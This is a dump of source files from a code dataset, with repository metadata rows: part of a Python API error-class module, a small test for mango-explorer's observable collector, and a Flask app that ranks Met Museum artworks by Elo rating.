for err in _errors['errors']:
if 'message' in err:
err_msg.append(err['message'])
_message = '. '.join(err_msg)
elif _type:
_message = str(_type)
return _message
class Unknown(RemoteError):
pass
class BadRequest(RemoteError):
pass
class Forbidden(RemoteError):
pass
class Conflict(RemoteError):
pass
class NotFound(RemoteError):
pass
class OverQuota(RemoteError):
pass
NOT_FOUND = exceptions.NOT_FOUND + (
ResourceNotFound,
NotFound,
)
RECOVERABLE = exceptions.RECOVERABLE + (
BadRequest,
Conflict,
)
UNAUTHORIZED = exceptions.UNAUTHORIZED + (
Forbidden,
)
| 23.673469 | 71 | 0.655172 |
c64d1070668087f8944cac487dc8e8cdf9fecabb | 236 | py | Python | tests/test_observables.py | mschneider/mango-explorer | ed50880ef80b31b679c9c89fa9bf0579391d71c9 | [
"MIT"
] | 1 | 2021-09-09T20:49:46.000Z | 2021-09-09T20:49:46.000Z | tests/test_observables.py | mschneider/mango-explorer | ed50880ef80b31b679c9c89fa9bf0579391d71c9 | [
"MIT"
] | null | null | null | tests/test_observables.py | mschneider/mango-explorer | ed50880ef80b31b679c9c89fa9bf0579391d71c9 | [
"MIT"
] | 2 | 2021-09-09T20:49:50.000Z | 2021-11-05T21:41:41.000Z | from .context import mango
import rx
def test_collecting_observer_subscriber():
items = ["a", "b", "c"]
actual = mango.CollectingObserverSubscriber()
rx.from_(items).subscribe(actual)
assert actual.collected == items
| 21.454545 | 49 | 0.711864 |
78f999daaed6f06f0a08a7b249caa79cd8f07ccb | 2,997 | py | Python | application/main/main_views.py | alchekroun/eloart | 2564ba2d25b584fcae4344cac55c048b0b6f2548 | [
"Unlicense"
] | null | null | null | application/main/main_views.py | alchekroun/eloart | 2564ba2d25b584fcae4344cac55c048b0b6f2548 | [
"Unlicense"
] | null | null | null | application/main/main_views.py | alchekroun/eloart | 2564ba2d25b584fcae4344cac55c048b0b6f2548 | [
"Unlicense"
] | null | null | null | import requests
from ..helpElo import newelo
from flask import Blueprint, render_template, redirect, url_for
from sqlalchemy.sql.expression import func
from application import db
from application.models import Piece
main_bp = Blueprint('main_bp', __name__, template_folder='templates', static_folder='static')
@main_bp.route('/')
def index():
f1 = Piece.query.order_by(func.rand()).limit(1).first()
f2 = Piece.query.filter(Piece.nom != f1.nom).order_by(func.rand()).limit(1).first()
return render_template('index.html', f1=f1, f2=f2)
@main_bp.route('/ranks/')
def ranks():
allrank = Piece.query.order_by(Piece.elo.desc())
return render_template('ranks.html', allrank=allrank)
@main_bp.route('/about/')
def about():
return render_template('about.html')
@main_bp.route('/score/<idPiece1>/<idPiece2>/')
def score(idPiece1, idPiece2):
winner = Piece.query.get(idPiece1)
loser = Piece.query.get(idPiece2)
winner.elo = newelo(winner.elo, loser.elo, 1)
loser.elo = newelo(loser.elo, winner.elo, 0)
db.session.commit()
return redirect(url_for('main_bp.index'))
@main_bp.route('/piece/<idPiece>')
def showpiece(idPiece):
piece = Piece.query.get(idPiece)
if piece:
return render_template('oeuvre.html', piece=piece)
return render_template('error.html')
@main_bp.route('/init_db/')
def init_db():
"""
try:
response = requests.get("https://collectionapi.metmuseum.org/public/collection/v1/search?departmentId=11"
"&hasImages=true&isHighlight=true&q=french")
response.raise_for_status()
except requests.RequestException:
return redirect(url_for('main_bp.error'))
allobjectids = response.json()
for piece in allobjectids["objectIDs"]:
req = "https://collectionapi.metmuseum.org/public/collection/v1/objects/" + str(piece)
reqON = requests.get(req)
pieceJson = reqON.json()
id = pieceJson["objectID"]
nom = pieceJson["title"]
linkImage = pieceJson["primaryImage"]
autheur = pieceJson["artistDisplayName"]
date = pieceJson["objectDate"]
pieceDBtoAdd = Piece(id=id, nom=nom, linkImage=linkImage, autheur=autheur, date=date)
db.session.add(pieceDBtoAdd)
print('ok')
"""
req = "https://collectionapi.metmuseum.org/public/collection/v1/objects/438822"
reqON = requests.get(req)
pieceJson = reqON.json()
id = pieceJson["objectID"]
nom = pieceJson["title"]
linkImage = pieceJson["primaryImage"]
autheur = pieceJson["artistDisplayName"]
date = pieceJson["objectDate"]
wikiAutheur = pieceJson["artistWikidata_URL"]
pieceDBtoAdd = Piece(id=id, nom=nom, linkImage=linkImage, autheur=autheur, date=date, wikiAutheur=wikiAutheur)
db.session.add(pieceDBtoAdd)
print('ok')
db.session.commit()
return redirect(url_for('main_bp.index'))
@main_bp.route('/error/')
def error():
return render_template('error.html')
| 31.882979 | 114 | 0.682349 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.